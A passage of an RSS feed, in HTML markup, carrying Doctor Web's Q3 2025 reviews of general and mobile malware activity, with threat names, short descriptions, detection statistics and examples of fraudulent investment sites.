        &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan written in the Go programming language and designed to download various miner trojans and adware into infected systems. This malware is a DLL file located at &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. To launch, it exploits a DLL Search Order Hijacking vulnerability in the uTorrent torrent client.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A torrent client designed to install unwanted programs on a user’s device.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;h3&gt;Statistics for malware discovered in email traffic&lt;/h3&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/02_mail_traffic_q2_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/02_mail_traffic_q2_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Exploits designed to take advantage of Microsoft Office software vulnerabilities and allow an attacker to run arbitrary code.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious JavaScript script that generates a phishing web page.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Muldrop.371&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious JavaScript script that installs a payload into the system.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;Encryption ransomware&lt;/h3&gt;
    &lt;p&gt;In Q3 2025, the number of requests made to decrypt files affected by encoder trojans increased by 3.02%, compared to Q2 2025.&lt;/p&gt;
    &lt;p&gt;The dynamics of the decryption requests received by Doctor Web’s technical support service:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/03_encoder_requests_q3_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/03_encoder_requests_q3_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;The most common encoders of Q3 2025:&lt;/p&gt;
    &lt;ul&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 26.99% of user requests&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3.07% of user requests&lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2.76% of user requests&lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.41542&lt;/b&gt; — 2.15% of user requests&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.29750&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 1.84% of user requests&lt;/li&gt;
    &lt;/ul&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;Network fraud&lt;/h3&gt;
    &lt;p&gt;In Q3 2025, Doctor Web’s Internet analysts continued to detect new fake Telegram messenger websites, including those that fraudsters used to try to gain access to user accounts:&lt;/p&gt;
    &lt;div class="flex fxCenter" style="margin-bottom: 12px;"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_1.png" class="preview"&gt;
                &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_1.1.png" alt="#drweb" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_2.png" class="preview"&gt;
                &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_2.1.png" alt="#drweb" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p&gt;In addition, finance-themed fraudulent sites continued to emerge. One of them lured users to an “investment platform of the future” called Apple Trade AI, which supposedly had been created by the Apple Corporation. Cybercriminals promised potential victims the opportunity to make more than $4,000 a month. To “access” the platform, they were required to register by providing personal information.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/05_fraud_appletradeai.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/05_fraud_appletradeai.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Other Internet resources offered visitors a chance to join a “new investment platform from Meta” and “create a source of constant income, starting from $4,000 a month”. To access the “platform”, users were asked to take a survey and then register.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/06_fraud_inv_1.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/06_fraud_inv_1.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Our experts also discovered more variants of fake investing platforms that allegedly allowed users to make money with the help of trading bots in &lt;i&gt;WhatsApp&lt;/i&gt;.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/07_fraud_whatsappbusiness.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/07_fraud_whatsappbusiness.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;To “work” with the promised services, potential victims had to provide personal data:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/08_fraud_whatsappbusiness.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/08_fraud_whatsappbusiness.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;A number of fraudulent websites were designed for audiences in specific countries. Some of them were targeting CIS-based users, to whom fraudsters offered the chance to “open a closed investment market” and access some exclusive investments through the INSIDER X financial service. To do so, visitors had to “leave a request” by providing personal data.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/09_fraud_insiderx.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/09_fraud_insiderx.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;In one of the schemes designed for Russian users, cybercriminals asked users to take a survey in order to gain access to an “investment platform” that was supposedly related to large oil and gas companies and the state-backed Gosuslugi &lt;i&gt;(Госуслуги)&lt;/i&gt; portal:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/10_fraud_gazgosusl.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/10_fraud_gazgosusl.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Scammers passed off some other sites as legitimate Russian bank services and told users they could register in order to “earn at least 50,000 rubles a week”:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/11_fraud_finance.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/11_fraud_finance.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Once again, users from some other countries encountered similar fake websites. On one of them, fraudsters offered users from Kyrgyzstan the opportunity to become part of a people's program and invest in what they claimed was the country’s largest company:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/12_fraud_gaz.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/12_fraud_gaz.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Another site was allegedly tied to a Georgian bank and allowed users to join its “investment platform”:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/13_fraud_bankopros.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/13_fraud_bankopros.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;The scammers passed off a similar fake website as belonging to one of the Kazakhstan banks and promised users an income starting from 600,000 tenge per month:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/14_fraud_bank.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/14_fraud_bank.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;On another site, malicious actors, allegedly on behalf of a Turkish oil and gas company, offered potential victims the opportunity to join an investment platform and make “up to 9,000 Turkish lira a day”:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/15_fraud_bankoffer.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/15_fraud_bankoffer.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;At the same time, fraudsters continued exploiting the topic of all kinds of government payments and compensations. On one of the unwanted sites targeting Kazakhstani users, visitors allegedly could check whether financial compensation was available to them and get up to 5,000,000 tenge:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 32px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/16_fraud_compensation.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/16_fraud_compensation.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;Malicious and unwanted programs for mobile devices&lt;/h3&gt;
    &lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q3 2025, users most often encountered &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; ad-displaying trojans. At the same time, the previously leading &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojans dropped to second place, significantly reducing their activity. The third most common threat was &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs.&lt;/p&gt;
    &lt;p&gt;Compared to the second quarter, the number of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; banking trojan detections increased, while the banking trojans &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; were, to the contrary, detected less often.&lt;/p&gt;
    &lt;p&gt;In August, Doctor Web’s experts &lt;a href="https://news.drweb.com/show/?i=15047&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; users about the &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; multifunctional backdoor that threat actors had used to spy on representatives of Russian business and steal confidential data from them.&lt;/p&gt;
    &lt;p&gt;Over the course of the last three months, more than 70 malicious and unwanted apps were discovered on Google Play. Among them were &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans, which subscribe users to paid services, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs, and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;—a piece of software that allegedly allowed users to convert virtual rewards into real money.&lt;/p&gt;
    &lt;p&gt;The following Q3 2025 events involving mobile malware are the most noteworthy:&lt;/p&gt;
    &lt;ul&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojans were more active.&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojan activity decreased.&lt;/li&gt;
        &lt;li&gt;Users encountered &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; banking trojans more often.&lt;/li&gt;
        &lt;li&gt;The number of &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojan attacks decreased.&lt;/li&gt;
        &lt;li&gt;Malicious actors used a multifunctional backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; to spy on Russian business representatives.&lt;/li&gt;
        &lt;li&gt;Many threats were distributed on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p&gt;To find out more about the security-threat landscape for mobile devices in Q3 2025, read our &lt;a href="https://news.drweb.com/show/?i=15060&amp;lng=en" target="_blank"&gt;special overview&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15060&amp;lng=en</guid><title>Doctor Web’s Q3 2025 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=15060&amp;lng=en&amp;c=9</link><pubDate>Wed, 01 Oct 2025 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 1, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section&gt;
    &lt;p&gt;&lt;strong&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; ad-displaying trojans were the most widespread threats of Q3 2025. They were detected on protected devices 18.19% more often than during the previous observation period.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
    &lt;p&gt;The adware trojans &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, whose activity decreased for the second quarter in a row, fell to second place. In the past 3 months, users encountered them 71.85% less often. These malicious apps conceal their icons, making the trojans harder to detect and remove, and then display ads, including full-screen videos.&lt;/p&gt;
    &lt;p&gt;Third place was again occupied by the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans that cybercriminals use in various fraudulent schemes; the number of times they were detected decreased by 7.49%. Instead of providing the declared functionality, these malicious apps often load various websites, including fraudulent and malicious ones, as well as bookmaker and online casino websites.&lt;/p&gt;
    &lt;p&gt;Despite a 38.88% decline in activity, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; trojans remain the most widespread banking malware. Threat actors use them to gain illegal access to banking accounts and steal money. These trojans can display phishing windows to hijack logins and passwords, imitate the appearance of real banking software, intercept SMS to obtain one-time codes, etc.&lt;/p&gt;
    &lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; trojans were followed by the &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; trojans, which were detected 18.91% more often than in Q2. Such trojans also try to gain access to users’ online banking accounts by intercepting confirmation codes. At the same time, these malicious apps can execute various commands coming from cybercriminals. Some of them also allow infected devices to be controlled remotely.&lt;/p&gt;
    &lt;p&gt;Rounding out the top three, &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojans were detected 17.25% less often than in the previous quarter. These malicious apps are based on the source code of the spyware trojan SpyNote and provide a wide range of functions, including the ability to remotely control affected devices.&lt;/p&gt;
    &lt;p&gt;In August, we &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=15047" target="_blank"&gt;informed&lt;/a&gt; users about a malware distribution campaign involving the &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; multi-functional backdoor. Cybercriminals use this piece of malware to steal confidential data and spy on Android device users. Threat actors sent messages to potential victims via various messengers, offering an “anti-virus” that can be installed from the attached APK file. Doctor Web’s anti-virus laboratory discovered the first versions of this backdoor back in January 2025 and has continued to monitor its development ever since. Our experts believe that this backdoor is used in targeted attacks and is not intended for mass distribution. The main target for cybercriminals is representatives of Russian businesses.&lt;/p&gt;
    &lt;p&gt;Over the course of Q3, a large number of malicious programs were distributed on Google Play for a combined total of over 1,459,000 installations. Among them were dozens of &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans that subscribe victims to paid services and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious fake programs. In addition, our malware analysts discovered yet another app that supposedly allowed virtual rewards to be converted into real money.&lt;/p&gt;
    &lt;div class="colorful"&gt;
        &lt;h3&gt;Principal trends of Q3 2025&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; ad-displaying trojans became the most widespread threats&lt;/li&gt;
            &lt;li&gt;The activity of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans continued to decline&lt;/li&gt;
            &lt;li&gt;The number of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; banking trojan attacks increased&lt;/li&gt;
            &lt;li&gt;Banking trojans &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; were less active&lt;/li&gt;
            &lt;li&gt;Cybercriminals used a multi-functional backdoor, &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, to attack representatives of Russian businesses&lt;/li&gt;
            &lt;li&gt;Many malicious apps were found on Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h3&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/01_malware_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/01_malware_q3_2025_en.1.png" alt="Malware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that loads the website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for malicious &lt;i&gt;WhatsApp&lt;/i&gt; messenger mods that can covertly load various websites in the background.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a packer for &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; trojans that is designed to protect them from being detected and analyzed. Threat actors most often use the packer together with malicious Telegram messenger mods in which these trojans are embedded.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/02_unwanted_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/02_unwanted_q3_2025_en.1.png" alt="Unwanted_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, take photos and video with the camera, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/03_riskware_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/03_riskware_q3_2025_en.1.png" alt="Riskware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
